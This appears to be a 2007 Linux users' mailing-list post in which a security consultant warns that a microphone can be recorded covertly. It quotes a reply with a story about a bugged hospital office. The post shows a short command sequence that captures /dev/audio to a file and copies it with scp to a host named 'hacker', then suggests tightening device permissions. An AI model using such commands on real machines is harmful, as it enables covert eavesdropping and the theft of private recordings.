[ale] Paranoia, FUD, slow day...

Bob Toxen transam at verysecurelinux.com
Tue Jan 30 19:48:48 EST 2007


On Linux, all one needs to do is:

     cat /dev/audio > listen
     [wait a while]
     ^C
     scp listen to hacker:.

There are more elegant methods, all of which involve reading
/dev/audio.  You do have your /dev/audio mode 622, I hope.

Thanks for the cool story!  I'm seen some industrial espionage too.

Bob Toxen
bob at verysecurelinux.com               [Please use for email to me]
http://www.verysecurelinux.com        [Network&Linux/Unix security consulting]
http://www.realworldlinuxsecurity.com [My book:"Real World Linux Security 2/e"]
Quality Linux & UNIX security and SysAdmin & software consulting since 1990.

"Microsoft: Unsafe at any clock speed!"
   -- Bob Toxen 10/03/2002

On Mon, Jan 29, 2007 at 06:28:59PM -0500, Mike Harrison wrote:
> > (via Mobile providers) to remotely enable the microphone in a cellphone
> > without the user's knowledge.   How do we know the same thing isn't
> > possible via our ISPs and our PCs? 
> 
> You don't. 
> 
> And I wear a tinfoil lined hat. I know. 
> 
> But seriously, stupider things have happened - Long non-linux story:
> 
> When I worked in hospitals (1980's),  one hospital administrator
> took me for a walk, and told he he thought his office 
> was bugged because he was in negotiations for the 
> purchase of the hospital by a large chain, and they
> seemed to know too much too quickly. We laughed, 
> I said we'd go check it out that evening. 
> 
> We went in in sock feet.. and eventually (no tech tools, just by looking)
> found a microphone and transmitter above his desk. We left it alone. 
> 
> With the advice of the FBI, we left it in place.
> The CFO had some really interesting meetings
> in the Presidents office, and when 
> the other Hospital made their aquisition bids
> in person (crossing state lines.. ) they got nailed. 
> They had documents in posession with information 
> that had been planted (stupid). They went to jail. 
> 
> My point is.. it doesn't just happen on TV, and
> if the stakes are high enough, anything is possible. 
> 
> 
> 
> 
> 
> 
> 
> 
> _______________________________________________
> Ale mailing list
> Ale at ale.org
> http://www.ale.org/mailman/listinfo/ale



More information about the Ale mailing list